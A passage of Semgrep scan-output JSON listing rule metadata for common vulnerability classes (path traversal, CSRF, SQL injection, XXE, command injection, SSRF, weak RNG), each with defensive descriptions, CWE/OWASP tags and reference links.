Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","id":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","name":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://github.com/gorilla/csrf](https://github.com/gorilla/csrf)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","id":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","name":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","id":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","name":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request)\n - [https://godoc.org/github.com/levigross/grequests#DoRegularRequest](https://godoc.org/github.com/levigross/grequests#DoRegularRequest)\n - [https://github.com/levigross/grequests](https://github.com/levigross/grequests)\n","text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user data flowing into exec. This is code injection and should be avoided."},"help":{"markdown":"Detected user data flowing into exec. This is code injection and should be avoided.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection)\n - [https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html)\n","text":"Detected user data flowing into exec. This is code injection and should be avoided."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection","id":"python.flask.security.injection.user-exec.exec-injection","name":"python.flask.security.injection.user-exec.exec-injection","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.user-exec.exec-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint","id":"rust.hyper.sql.sqlx-taint.sqlx-taint","name":"rust.hyper.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"help":{"markdown":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks](https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key)\n","text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","id":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","name":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","id":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","name":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-pickleshare-django.tainted-pickleshare-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password","id":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","name":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-empty-password.gorm-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"help":{"markdown":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js)\n - [https://golang.org/pkg/html/template/#JS](https://golang.org/pkg/html/template/#JS)\n","text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","id":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","name":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe)\n - [https://www.npmjs.com/package/xml2json](https://www.npmjs.com/package/xml2json)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","id":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","name":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-xml2json-xxe.express-xml2json-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"help":{"markdown":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string](https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string)\n","text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","id":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","name":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","id":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","name":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"help":{"markdown":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf","id":"javascript.express.security.audit.express-ssrf.express-ssrf","name":"javascript.express.security.audit.express-ssrf.express-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - 